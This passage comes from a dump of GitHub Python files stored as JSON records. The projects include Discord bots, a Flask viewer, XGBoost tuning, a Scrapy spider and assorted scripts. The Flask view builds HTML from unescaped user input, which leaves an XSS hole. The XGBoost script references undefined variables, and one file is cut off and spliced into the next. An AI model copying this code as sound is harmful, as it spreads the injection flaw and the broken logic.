norm_map = num.zeros(ngridpoints)\n\n for istation in range(nstations):\n dists_station = distances[:, istation]\n\n dist_min = num.floor(num.min(dists_station) / delta_ring) * delta_ring\n dist_max = num.ceil(num.max(dists_station) / delta_ring) * delta_ring\n\n dist = dist_min\n while dist < dist_max:\n indices = num.where(num.logical_and(\n dist <= dists_station,\n dists_station < dist + delta_ring))[0]\n\n nexpect = math.pi * ((dist + delta_ring)**2 - dist**2) /\\\n delta_grid**2\n\n # nexpect = math.pi * ((dist + delta_ring)**3 - dist**3) /\\\n # delta_grid**3\n\n norm_map[indices] += indices.size / nexpect\n\n dist += delta_ring\n\n norm_map /= nstations\n\n return norm_map\n\n\n__all__ = [\n 'Grid',\n 'Carthesian3DGrid',\n]\n","repo_name":"braunfuss/silvertine","sub_path":"src/seiger_lassie/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":6069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15850124190","text":"from datetime import datetime, timedelta\r\nfrom random import choice\r\nimport apscheduler\r\nimport asyncio\r\nfrom discord import Embed\r\nfrom discord.ext import commands\r\nfrom discord.ext.commands import Cog\r\nfrom discord.ext.commands import command, has_permissions\r\nimport discord\r\n\r\nnumbers = (\"1️⃣\", \"2️⃣\", \"3️⃣\", \"4️⃣\", \"5️⃣\", \"6️⃣\", \"7️⃣\", \"8️⃣\", \"9️⃣\", \"🔟\")\r\n\r\nclass Poll(commands.Cog, name ='poll+', description ='Make a poll for people in chat to react to. Has maximum 10 options and provides a summary after a set time'):\r\n#Make a poll for people in chat to react to. The number of reactions is customizable up to a max of 10 and the duration of the poll can be set in the main command\r\n\tdef __init__(self, client):\r\n\t\tself.client = client\r\n\t\tself.polls = []\r\n\r\n\t@commands.command(name=\"createpoll\", aliases=[\"poll\"])\r\n\tasync def create_poll(self, ctx, seconds: int, question: str, *options):\r\n\t\tif len(options) > 10:\r\n\t\t\tawait ctx.send(\"Max 10 options.\")\r\n\t\telse:#create the poll\r\n\t\t\tembed = Embed(title=\"Poll\", description=question, colour=self.client.MAINCOLOUR, timestamp=datetime.utcnow())\r\n\t\t\tfields = [(\"Options\", \"\\n\".join([f\"{numbers[idx]} {option}\" for idx, option in enumerate(options)]), False)]\r\n\t\t\tembed.set_footer(text ='React to cast a vote!')\r\n\t\tfor name, value, inline in fields:\r\n\t\t\tembed.add_field(name=name, value=value, inline=inline)\r\n\t\tmessage = await ctx.send(embed=embed)\r\n\t\tfor emoji in numbers[:len(options)]:\r\n\t\t\tawait message.add_reaction(emoji)\r\n\t\tself.polls.append((message.channel.id, message.id))\r\n\r\n\t\tawait asyncio.sleep(seconds)\r\n\t\t#Get the message then count and sort the votes\r\n\t\tmsg = await message.channel.fetch_message(message.id)\r\n\t\tvotes = msg.reactions\r\n\t\tmost_voted = max(votes, key=lambda r: r.count)\r\n\t\tvotes.remove(most_voted)\r\n\t\tsecond_most_voted = max(votes, key=lambda r: r.count)\r\n\t\t#Send an embed with the results\r\n\t\tif most_voted.count != second_most_voted.count:\r\n\r\n\t\t\twin_embed = discord.Embed(title = 'Vote result', description = f'{most_voted.emoji} {options[numbers.index(most_voted.emoji)]}\\n\\u200b', colour = self.client.MAINCOLOUR)\r\n\t\t\twin_embed.set_footer(text=f'Question: {question}')\r\n\t\t\tawait ctx.send(embed = win_embed)\r\n\r\n\t\telse:\r\n\t\t\ttie_embed = discord.Embed(title = 'Vote result', description = f'Its a tie!\\n\\u200b', colour = self.client.MAINCOLOUR)\r\n\t\t\ttie_embed.set_footer(text=f'Question: {question}')\r\n\t\t\tawait ctx.send(embed = tie_embed)\r\n\r\n\t\tself.polls.remove((message.channel.id, message.id))\r\n\r\n\t@create_poll.error\r\n\t#standard error embed message triggered when an error occurs\r\n\tasync def create_poll_error(self, ctx, error):\r\n\t\tif isinstance(error, commands.MissingRequiredArgument):\r\n\t\t\terror_embed = discord.Embed(title = 'Invalid input', description = f'Ensure the format is\\n`{ctx.prefix}poll FOUND'.format(answer_url)\n if answer_type:\n if not short:\n short_str = 'N/A'\n if not long:\n long_str = 'N/A'\n if answer_type == 'rich_set' or answer_type == 'rich_list':\n list = ast.literal_eval(long)\n list_type = 'ul' if answer_type == 'rich_list' else 'ul'\n long_str = '<{0}>{1}'.format(\n list_type,\n ''.join(['
  • {0}
  • '.format(escape(x)) for x in list]))\n \n results_html = ''\n cur.execute('''\n SELECT\n text, url\n FROM queries AS q\n JOIN search_results AS r ON q.id = r.question_id\n WHERE q.id = %s\n ORDER BY r.position ASC;''', [id])\n for text, url in cur.fetchall():\n results_html += '
  • {1}
  • '.format(url, text)\n if results_html:\n results_html = '
      {0}
    '.format(results_html)\n else:\n results_html = 'Not extracted yet'\n\n return '''\n \n \n \n \n \n {2}\n

    {0}

    \n \n \n \n \n \n \n
    Answer Type{5}
    Short answer{3}
    Long answer{4}
    Answer URL: {6}
    \n

    Results:

    {7}\n {1}\n \n \n '''.format(question, html, search_form(id), short_str, long_str, answer_type_str, answer_url_str,\n results_html)\n\n@app.route('/search')\ndef show_search():\n query = request.args.get('query')\n cur.execute(\n 'SELECT id, question FROM queries WHERE html IS NOT NULL AND STRPOS(question, %s) > 0 LIMIT 500;', \n [query])\n results_str = ''\n for id, question in cur.fetchall():\n results_str += '
  • {1}
  • '.format(id, question)\n return '''\n \n \n {2}\n

    Scraped questions that have \"{0}\" as a substring:

    \n
      {1}
    \n \n \n '''.format(query, results_str, search_form(query=query))\n","repo_name":"CogComp/should-X","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43174396367","text":"import os\r\nfrom discord.ext import commands\r\nfrom loguru import logger\r\nimport json\r\n\r\nwith open(\"data/database.json\", \"r\") as f:\r\n data = json.load(f)\r\n \r\ntoken = data[\"token\"]\r\nclient = commands.Bot(command_prefix='b.')\r\nclient.remove_command('help')\r\n\r\n\r\ndef load_cogs():\r\n for file in os.listdir(\"cogs\"):\r\n if file.endswith(\".py\"):\r\n name = file[:-3]\r\n try:\r\n client.load_extension(f\"cogs.{name}\")\r\n logger.info(f\"Loaded cogs.{name}\")\r\n except Exception as e:\r\n logger.error(f\"Couldn't load cog: {name}.\")\r\n logger.exception(e)\r\n\r\n\r\nload_cogs()\r\nclient.run(token)\r\n","repo_name":"amymainyc/build-bot-public","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70728536487","text":"# Load the created pickle file \ndata = pd.read_pickle('data.pkl')\n\n# Creating train, validation and test datasets\n# Train\nX_train = data[data.date_block_num < 34].drop(['item_cnt_month'], axis=1)\nY_train = data[data.date_block_num < 34]['item_cnt_month']\n# Validation\nX_valid = data[data.date_block_num == 33].drop(['item_cnt_month'], axis=1)\nY_valid = data[data.date_block_num == 33]['item_cnt_month']\n# Test\nX_test = data[data.date_block_num == 34].drop(['item_cnt_month'], axis=1)\n\n# Loading this data into DMatrices\ndtrain = xgb.DMatrix(X_train, label=Y_train)\ndval = xgb.DMatrix(X_valid, label=Y_valid)\n\n# Initialize parameters for the XGBoost Model \n# Range of values hint take from discussion boards\n\nparams = {\n # Parameters that we are going to tune.\n 'max_depth':10,\n 'min_child_weight': 300,\n 'eta':0.1,\n 'subsample': 0.6,\n 'colsample_bytree': 0.5,\n # Other parameters\n 'objective':'reg:linear',\n 'eval_metric' : 'mse'\n}\n\n# Number of boosting rounds\nnum_boost_rounds = 900\n\n# The model \nmodel = xgb.train(\n params,\n dtrain,\n num_boost_round=num_boost_round,\n evals=[(dtest, \"Test\")],\n early_stopping_rounds=10\n)\n\n# Tuning the hyperparameter max_depth and min_child_weight \n# Max depth is the depth of the constructed tree, deep trees are more complex and may tend to overfit\n# Min_child_weight is the minimum weight required in order to create a new node in the tree. Small min_child_weight \n# creates children with fewer samples and complex trees that may overfit\n\n# Define the range of the grid search parameters - max_depth and min_child_weight \n\ngridsearch_params = [(max_depth,min_child_weight) for max_depth in range(9,12) for min_child_weight in range(250,310,10)]\n\n# Run cross validation on the parameters\nmin_mse = float(\"Inf\")\nbest_params = None\nfor max_depth, min_child_weight in gridsearch_params:\n print(\"CV with max_depth={}, min_child_weight={}\".format(\n max_depth,\n min_child_weight))\n # Update parameters\n params['max_depth'] = max_depth\n params['min_child_weight'] = min_child_weight\n \n # Run CV\n cv_results = xgb.cv(\n params,\n dtrain,\n num_boost_round=num_boost_round,\n seed=42,\n nfold=5,\n metrics={'mse'},\n early_stopping_rounds=10\n )\n \n # Update best MSE\n mean_mse = cv_results['test-mse-mean'].min()\n boost_rounds = cv_results['test-mse-mean'].argmin()\n print(\"\\tMSE {} for {} rounds\".format(mean_mse, boost_rounds))\n if mean_mse < min_mse:\n min_mse = mean_mse\n best_params = (max_depth,min_child_weight)\n \nprint(\"Best params: {}, {}, MSE: {}\".format(best_params[0], best_params[1], min_mse))\n# The best parameter values for max_depth and min_child_weight was 10 and 300 respectively\n\n# Tune parameters subsample and colsample_bytree \n# Subsample : number of rows to sample from the dataset. By default the value is set to one, indicating that all rows will be used\n# Colsample_bytree : number of features to sample from dataset. Default value = 1, indicating that all columns will be used\n\n# Define gridsearch parameters\ngridsearch_params = [\n (subsample, colsample)\n for subsample in [i/10. for i in range(7,11)]\n for colsample in [i/10. for i in range(7,11)]\n]\n\nmin_mse = float(\"Inf\")\nbest_params = None\n# We start by the largest values and go down to the smallest\nfor subsample, colsample in reversed(gridsearch_params):\n print(\"CV with subsample={}, colsample={}\".format(\n subsample,\n colsample))\n # We update our parameters\n params['subsample'] = subsample\n params['colsample_bytree'] = colsample\n # Run CV\n cv_results = xgb.cv(\n params,\n dtrain,\n num_boost_round=num_boost_round,\n seed=42,\n nfold=5,\n metrics={'mse'},\n early_stopping_rounds=10\n )\n # Update best score\n mean_mse = cv_results['test-mse-mean'].min()\n boost_rounds = cv_results['test-mse-mean'].argmin()\n print(\"\\tMSE {} for {} rounds\".format(mean_mse, boost_rounds))\n if mean_mse < min_mse:\n min_mse = mean_mse\n best_params = (subsample,colsample)\nprint(\"Best params: {}, {}, MSE: {}\".format(best_params[0], best_params[1], min_mse))\n\n# Best parameter value for subsample and colsample was 0.8. \n# These tuned parameters are used in the construction of the final XGBOOST model. \n","repo_name":"ey4172/Forecasting-Future-Sales","sub_path":"hyperparameter_tuning_xgboost.py","file_name":"hyperparameter_tuning_xgboost.py","file_ext":"py","file_size_in_byte":4458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32065925743","text":"import scrapy\nimport datetime\n\n\n\n\nclass MySpider1Spider(scrapy.Spider):\n date = input(\"Ваша дата у форматі yyyy-mm-dd: \")\n correct_date = None\n date_datetime_format = None\n try:\n date_datetime_format = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n day_start = date_datetime_format.day\n month_start = date_datetime_format.month\n year_start = date_datetime_format.year\n correct_date = True\n except:\n print(\"Невірна дата\")\n\n\n name = 'my_spider_1'\n allowed_domains = ['https://www.vikka.ua']\n start_urls = ['https://www.vikka.ua/category/novini/']\n\n def parse(self, response):\n date = response.xpath(\"//span[@class='post-info-style']/text()\").extract()\n title = response.xpath(\"//h1[@class='post-title -margin-b']/text()\").extract()\n news_text = response.xpath(\"//div[@class='entry-content -margin-b']//p/text()\").extract()\n tags = response.xpath(\"//a[@class='post-tag']/text()\").extract()\n #news_url = response.xpath(\"\")\n\n #for item in zip(title, news_text, news_url):\n # data_dict = {\n # \"title\" : item[0],\n # \"news_text\" : item[1],\n # \"news_url\" : item[2]\n # }\n # yield data_dict\n\n\n\n\n\n\n\n","repo_name":"Marsianin007/HT_15_git","sub_path":"HT_15/scraper_1/scraper_1/spiders/my_spider_1.py","file_name":"my_spider_1.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24435423322","text":"import logging\nimport pprint\n\nfrom ...db.setting import session\nfrom ...db.search_keywords import SearchKeyword\nfrom ...util.anime_cour import Cours\n\nlogger = logging.getLogger(__name__)\n\nclass SearchKeywordsTaker:\n def take_search_keywords(self, anime):\n try:\n records = session.query(SearchKeyword) \\\n .filter(SearchKeyword.anime_id == anime.row_id) \\\n .all()\n logger.debug(pprint.pformat(records))\n return records\n except:\n logger.exception(\"Taking search words is failed.\")\n raise\n\n","repo_name":"U0326/anigiri-crawler","sub_path":"src/module/twitter/search/search_keywords_taker.py","file_name":"search_keywords_taker.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70859717929","text":"import json\nimport re\nfrom keyword import kwlist\nfrom typing import Any\n\n\ndef get_type_from_reference(str_ref, convert_to_calmel_case=True) -> str:\n pattern = r\".*/(.*)\"\n match = re.search(pattern, str_ref)\n ref_type = match[1] if match else str_ref\n if convert_to_calmel_case:\n return snake_case_to_camel_case(ref_type)\n return ref_type\n\n\ndef get_annotation_type(item: dict) -> Any:\n if item.get(\"type\") == \"array\":\n if item[\"items\"].get(\"type\"):\n type_anno = [item[\"items\"][\"type\"]]\n else:\n type_anno = item[\"items\"].get(\"$ref\")\n type_anno = [get_type_from_reference(type_anno)]\n elif item.get(\"type\") and not item.get(\"$ref\"):\n type_anno = item.get(\"type\")\n elif item.get(\"oneOf\"):\n type_anno = [get_annotation_type(item) for item in item[\"oneOf\"]]\n else:\n type_anno = item.get(\"$ref\")\n type_anno = get_type_from_reference(type_anno)\n return type_anno\n\n\ndef get_json_dict(path: str) -> dict:\n with open(path, \"r\") as f:\n return json.loads(f.read())\n\n\ndef snake_case_to_camel_case(string: str) -> str:\n return \"\".join(word[0].upper() + word[1:] for word in string.split(\"_\"))\n\n\nCAMEL_CASE_PATTERN = re.compile(r\"((?<=[a-z])[A-Z]|(? str:\n return CAMEL_CASE_PATTERN.sub(r\"_\\1\", string).lower()\n\n\ndef convert_to_python_type(field):\n if field.lower() == \"array\":\n return \"list\"\n elif field.lower() == \"boolean\":\n return \"bool\"\n elif field.lower() == \"integer\":\n return \"int\"\n elif field.lower() == \"number\":\n return \"float\"\n elif field.lower() == \"object\":\n return \"typing.Any\"\n elif field.lower() == \"string\":\n return \"str\"\n else:\n return str(field)\n\n\ndef shift_json_dict_names(plain_data: dict, classnames: dict) -> dict:\n return {v: plain_data[k] for k, v in classnames.items()}\n\n\ndef categorize_methods_as_files(json_dict: dict) -> dict:\n filenames = set()\n for method_dict in json_dict[\"methods\"]:\n method_name = method_dict[\"name\"].split(\".\")[0]\n filenames.add(method_name)\n\n return {name: {} for name in filenames}\n\n\ndef resolve_property_name(name: str):\n if name[0].isdigit() or name in kwlist:\n name = f\"_{name}\"\n return name\n","repo_name":"tososomaru/vk_schema_codegen","sub_path":"utils/strings_util.py","file_name":"strings_util.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12579944988","text":"filename = \"C:\\\\Users\\\\USER\\\\Desktop\\\\Python_Skillshare_Code_Repo\\\\files\\\\movies_line_by_line.txt\"\nwith open(filename) as file_object:\n lines = file_object.readlines()\n \"\"\"the readline() takes each line from the file and stores\n it in a list\"\"\" \n\nfor line in lines:\n print(line.strip())\n \"\"\"The above loop prints each contents from the list\"\"\"\n\nprint(type(lines))","repo_name":"JafarSadikGhub/Python_Skillshare_Practice_Code","sub_path":"sx7_making_a_list_from_a_file.py","file_name":"sx7_making_a_list_from_a_file.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9779426445","text":"import json\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom workspace.techsupport.jobs import (\n out_of_office_off,\n out_of_office_on,\n out_of_office_status,\n)\n\n\n@pytest.fixture\ndef config_path(tmp_path):\n yield tmp_path / \"test_ooo.json\"\n\n\n@pytest.mark.parametrize(\n \"config,message\",\n [\n (None, \"Tech support out of office OFF\"), # OOO not on\n (\n {\"start\": \"2022-01-01\", \"end\": \"3033-01-01\"}, # OOO on\n \"Tech support out of office OFF\",\n ),\n (\n {\"start\": \"3033-01-01\", \"end\": \"3033-01-01\"}, # OOO scheduled\n \"Scheduled tech support out of office cancelled\",\n ),\n ],\n)\ndef test_out_of_office_off(config_path, config, message):\n if config is not None:\n with open(config_path, \"w\") as f_out:\n json.dump(config, f_out)\n with patch(\"workspace.techsupport.jobs.config_file\", return_value=config_path):\n assert out_of_office_off() == message\n\n\n@pytest.mark.parametrize(\n \"config,message\",\n [\n (None, \"Tech support out of office is currently OFF.\"), # OOO not on\n (\n {\"start\": \"2000-01-01\", \"end\": \"2001-01-01\"}, # OOO past\n \"Tech support out of office is currently OFF.\",\n ),\n (\n {\"start\": \"2022-01-01\", \"end\": \"3033-01-01\"}, # OOO on\n \"Tech support out of office is currently ON until 3033-01-01.\",\n ),\n (\n {\"start\": \"3033-01-01\", \"end\": \"3033-01-01\"}, # OOO scheduled\n \"Tech support out of office is currently OFF.\\n\"\n \"Scheduled out of office is from 3033-01-01 until 3033-01-01.\",\n ),\n ],\n)\ndef test_out_of_office_status(config_path, config, message):\n if config is not None:\n with open(config_path, \"w\") as f_out:\n json.dump(config, f_out)\n with patch(\"workspace.techsupport.jobs.config_file\", return_value=config_path):\n assert out_of_office_status() == message\n\n\n@pytest.mark.parametrize(\n \"start,end,message\",\n [\n (\n \"2020-12-01\",\n \"3033-12-01\",\n \"Tech support out of office now ON until 3033-12-01\",\n ),\n (\n \"3033-12-01\",\n \"3034-12-01\",\n \"Tech support out of office scheduled from 3033-12-01 until 3034-12-01\",\n ),\n ],\n)\ndef test_out_of_office_on(config_path, start, end, message):\n assert not config_path.exists()\n with patch(\"workspace.techsupport.jobs.config_file\", return_value=config_path):\n assert out_of_office_on(start, end) == message\n assert config_path.exists()\n with open(config_path, \"r\") as f_in:\n config = json.load(f_in)\n assert config == {\"start\": start, \"end\": end}\n\n\n@pytest.mark.parametrize(\n \"start,end,message\",\n [\n # trying to set OOO in the past\n (\"2020-12-01\", \"2020-12-02\", \"Error: Can't set out of office in the past\"),\n # start date after end date\n (\"3033-12-01\", \"3033-11-01\", \"Error: start date must be before end date\"),\n ],\n)\ndef test_out_of_office_on_errors(config_path, start, end, message):\n assert not config_path.exists()\n with patch(\"workspace.techsupport.jobs.config_file\", return_value=config_path):\n assert out_of_office_on(start, end) == message\n assert not config_path.exists()\n\n\n@pytest.mark.parametrize(\n \"start,end\",\n [\n (\"2020-02-30\", \"2020-12-02\"), # bad start\n (\"3033-12-01\", \"3033-13-01\"), # bad end\n ],\n)\ndef test_out_of_office_on_invalid_dates(config_path, start, end):\n assert not config_path.exists()\n with patch(\"workspace.techsupport.jobs.config_file\", return_value=config_path):\n with pytest.raises(ValueError):\n out_of_office_on(start, end)\n assert not config_path.exists()\n","repo_name":"ebmdatalab/ebmbot","sub_path":"tests/test_tech_support_out_of_office.py","file_name":"test_tech_support_out_of_office.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"13316418570","text":"paths = {}\nfull_paths = []\nwith open(\"input.txt\", \"r\") as f:\n for line in f:\n src, dst = line.strip().split('-')\n if src in paths:\n paths[src].append(dst)\n else:\n paths[src] = [dst]\n if dst in paths:\n paths[dst].append(src)\n else:\n paths[dst] = [src]\n\n\ndef visited_two_small(visited):\n for visited_node in visited:\n if (visited_node == visited_node.lower()) and (len([x for x in visited if x == visited_node]) > 1):\n return True\n return False\n\n\ndef visit(node, visited):\n visited.append(node)\n for dst in paths[node]:\n if dst == 'end':\n final_path = visited.copy()\n full_paths.append(final_path.append(dst))\n elif (dst == dst.upper()) or (dst not in visited) or ((not visited_two_small(visited)) and (dst != 'start')):\n visit(dst, visited.copy())\n\n\nvisit('start', [])\nprint(len(full_paths))\n","repo_name":"n-parisi/advent-of-code-2021","sub_path":"pkg/12/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38733787448","text":"# Utworzyć klasy Notatka (Note) i Notatnik (Notebook). Klas notatki przechowuje autora, treść i czas utworzenia\n# (autor i treść są podawane jako argumenty konstruktora, a czas jest pobierany i zapisywany przy tworzeniu obiektu).\n# Konstruktor klasy Notatnik nie przyjmuje żadnych argumentów, lecz tworzy pustą listę do której będą dodawane obiekty\n# klasy Notatka. Klasa Notatnika musi posiadać implementacje metod, pozwalających: dodać nową notatkę, dodać istniejącą\n# notatkę, sprawdzić ile jest dodanych notatek, wyświetlić wszystkie dodane notatki.\n# Dodatkowo musi być obsłużona sytuacja kiedy notatnik jest pusty.\n# Podpowiedź:\n# do reprezentacji czasu można użyć modułu\n# datetime\n# Dokumentacja modułu\n# datetime\n# https://docs.python.org/3/library/datetime.html\nimport datetime\n\n\nclass Notebook:\n def __init__(self):\n self.notes = {}\n self.menu()\n\n def menu(self):\n run = True\n while run:\n choice = int(input('co chcesz zrobić? 1 - dodać notatkę, 2 - usunąć notatkę, 3 - sprawdzić liczbę notatek,'\n ' 4 - wyświetlić wszystkie notatki, 5 - zakończyć program: '))\n\n if choice == 1:\n self.add_note()\n if choice == 2:\n self.delete_note()\n if choice == 3:\n self.check_length()\n if choice == 4:\n self.show_notes()\n if choice == 5:\n run = False\n\n def add_note(self):\n author = input('kto jest autorem: ')\n content = input('treść: ')\n note_id = int(input('Podaj id:'))\n new_note = Note(author, content, note_id)\n self.notes.update({note_id: new_note})\n\n def delete_note(self):\n if len(self.notes):\n print(self.notes)\n which = int(input('którą notatkę chcesz usunąć, podaj id: '))\n self.notes.pop(which)\n\n def check_length(self):\n print(f'liczba notatek: {len(self.notes)}')\n\n def show_notes(self):\n print('Twoje notatki: ')\n for i in self.notes.items():\n print(i)\n\n\nclass Note:\n def __init__(self, author, content, note_id):\n self.author = author\n self.content = content\n self.time = datetime.datetime.now()\n self.note_id = note_id\n\n def __repr__(self):\n return f'autor: {self.author}, notatka: {self.content},czas dodania: {self.time}'\n\n\nNotebook()","repo_name":"KDebowiec/DevsMentoring","sub_path":"rozszerzenie/klasy/klasy7.py","file_name":"klasy7.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72309711849","text":"from pybrain.structure import FeedForwardNetwork\nfrom pybrain.structure import LinearLayer, SigmoidLayer\nfrom pybrain.structure import FullConnection\nimport math\n\nclass Prey:\n # initial radius\n init_radius = 20\n def __init__(self, direction, x, y):\n # radius\n self.radius = self.init_radius\n #Neural network\n self.nn = FeedForwardNetwork()\n #Add layers\n inLayer = LinearLayer(8)\n hiddenLayer = SigmoidLayer(9)\n outLayer = LinearLayer(4)\n self.nn.addInputModule(inLayer)\n self.nn.addModule(hiddenLayer)\n self.nn.addOutputModule(outLayer)\n #Add connections\n in_to_hidden = FullConnection(inLayer, hiddenLayer)\n hidden_to_out = FullConnection(hiddenLayer, outLayer)\n self.nn.addConnection(in_to_hidden)\n self.nn.addConnection(hidden_to_out)\n #initialize NN\n self.nn.sortModules()\n \n # Energy - dies when reaches 0\n self.energy = 350\n\n # Max Energy. the max amount of energy a prey can have\n self.max_energy = 500\n\n # Location\n self.x = x\n self.y = y\n\n # direction / angle\n self.direction = direction\n\n # Senses predator\n self.senses_predator = False\n\n # predator's general direction\n self.pred_direction = 0\n\n # other prey's general direction\n self.prey_direction = 0\n\n # other prey's radius\n self.prey_radius = 0\n\n # where to move to next\n self.next_x = x\n self.next_y = y\n\n # eat or not (eating regains energy)\n self.want_to_eat = False\n\n # move or not\n self.want_to_move = False\n\n # if energy is less than 100, gets hungry status\n self.is_hungry = False\n\n # Age\n self.age = 0\n\n # output thresholds for decisions\n self.move_threshold = 0\n self.eat_threshold = 0\n\n # has it mated and reproduced yet?\n self.not_mated = True\n\n # number of attacking preds\n self.num_atk_pred = 0\n\n # energy per pred. how much energy each predator gains when eating this prey \n self.energy_per_pred = 0\n\n def update(self):\n # metabolism depends on which state the prey is in (escaping from predator, idle)\n if (self.senses_predator is True):\n if (self.energy < 25):\n self.energy = 0\n else:\n self.energy -= 25\n else: # idle mode, consumes less energy\n if (self.energy < 10):\n self.energy = 0\n else:\n self.energy -= 10\n\n if (self.energy < 100):\n self.is_hungry = True\n else:\n self.is_hungry = False\n \n # Aging\n self.age += 1\n\n\n \n # Input vector\n # input values are determined by what the animat \n # is seeing and / or touching\n input_vector = (\n (2000 * int(self.senses_predator)),\n (2000 * self.energy),\n (2000 * self.is_hungry),\n (2000 * self.direction),\n (2000 * self.pred_direction),\n (2000 * self.prey_direction),\n (2000 * self.prey_radius),\n (2000 * self.age)\n )\n\n # Activate the nn\n output_vector = self.nn.activate(input_vector)\n # move\n if (output_vector[0] > self.move_threshold):\n self.want_to_move = True\n else:\n self.want_to_move = False\n # eat\n if (output_vector[1] > self.eat_threshold):\n self.want_to_eat = True\n else:\n self.want_to_eat = False\n # direction: turn right (clockwise)\n self.direction -= output_vector[2]\n #direction: turn left (counter clockwise)\n self.direction += output_vector[3]\n\n if (self.want_to_eat):\n if (self.energy >= 400):\n self.energy = 500\n else:\n self.energy += 100\n self.is_hungry = False\n\n\n\n","repo_name":"chuj/Animats","sub_path":"Prey.py","file_name":"Prey.py","file_ext":"py","file_size_in_byte":3648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22307969572","text":"from typing import Optional\n\nfrom naff import Member, Permissions\n\nfrom ElevatorBot.discordEvents.customInteractions import ElevatorInteractionContext\nfrom ElevatorBot.misc.formatting import embed_message\n\n\nasync def has_admin_permission(\n member: Member, ctx: Optional[ElevatorInteractionContext] = None, hidden: bool = True\n) -> bool:\n \"\"\"Returns if the member has admin permission\"\"\"\n\n result = member.has_permission(Permissions.ADMINISTRATOR)\n if ctx:\n if not ctx.responded:\n embed = embed_message(\n \"Error\",\n \"You need admin permissions to do this\",\n )\n\n await ctx.send(embeds=embed, ephemeral=hidden)\n\n return result\n\n\nasync def assign_roles_to_member(member: Member, *role_ids: int, reason: Optional[str] = None):\n \"\"\"Assigns the role_ids to the member if they exist, else fails silently\"\"\"\n\n guild = member.guild\n\n # check if member is not pending\n if not member.pending:\n # loop through role_ids and get the role objs\n for role_id in role_ids:\n role = await guild.fetch_role(role_id)\n\n if not role:\n continue\n\n # assign them\n await member.add_role(role=role, reason=reason)\n\n\nasync def remove_roles_from_member(member: Member, *role_ids: int, reason: Optional[str] = None):\n \"\"\"Removes the role_ids from the member if they exist, else fails silently\"\"\"\n\n guild = member.guild\n\n # check if member is not pending\n if not member.pending:\n # loop through role_ids and get the role objs\n for role_id in role_ids:\n role = await guild.fetch_role(role_id)\n\n if not role:\n continue\n\n # remove them\n await member.remove_role(role=role, reason=reason)\n","repo_name":"TheDescend/elevatorbot","sub_path":"ElevatorBot/misc/discordShortcutFunctions.py","file_name":"discordShortcutFunctions.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"27600705924","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# @Author : mofei\n# @Time : 2019/8/5 20:02\n# @File : p15_convert_strings_into_datetimes.py\n# @Software: PyCharm\n\n\"\"\"字符串转换为日期\"\"\"\n\nfrom datetime import datetime\n\n# 解析日期\ntext = '2019-08-03'\ny = datetime.strptime(text, '%Y-%m-%d')\nz = datetime.now()\nprint(z - y)\n\n# 日期格式化\nnice_z = datetime.strftime(z, '%A %B %d, %Y')\nprint(nice_z)\n\n\n# strptime() 的性能比较差,若要解析大量的日期,可以自己实现一个解析函数\ndef parse_ymd(s):\n year_s, mon_s, day_s = s.split('-')\n return datetime(int(year_s), int(mon_s), int(day_s))\ntext = '2019-08-03'\nx = parse_ymd(text)\nprint(x)\n","repo_name":"mofei952/cookbook","sub_path":"c03_numbers_dates_times/p15_convert_strings_into_datetimes.py","file_name":"p15_convert_strings_into_datetimes.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12477343117","text":"# -*- coding: utf-8 -*-\n\nimport net\nimport torch\nimport numpy as np\nimport copy\n\nx = np.loadtxt(\"../data_mat/dataTrain.dat\")\ny = np.loadtxt(\"../data_mat/valuTrain.dat\")\nx_val = np.loadtxt(\"../data_mat/dataVali.dat\")\ny_val = np.loadtxt(\"../data_mat/valuVali.dat\")\n\nx = torch.as_tensor(x, dtype=torch.float32)\ny = torch.as_tensor(y, dtype=torch.float32).reshape(len(y),1)\nx_val = torch.as_tensor(x_val, dtype=torch.float32)\ny_val = torch.as_tensor(y_val, dtype=torch.float32).reshape(len(y_val), 1)\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nx = x.to(device)\ny = y.to(device)\nx_val = x_val.to(device)\ny_val = y_val.to(device)\n\nmodel = net.energyRegNet()\nmodel.to(device)\n\nlossFunc = torch.nn.MSELoss().to(device)\ntrainLoss = torch.nn.MSELoss().to(device)\noptimizer = torch.optim.Adam(model.parameters(), lr=1e-5)\nlearR = 1e-5\nlossReg = 1.\nerrlis = np.zeros(100)\nmodel.train()\nfor t in range(500000):\n ypred = model(x)\n loss = trainLoss(ypred, y)\n print(t, loss.item())\n if t > 100 and t % 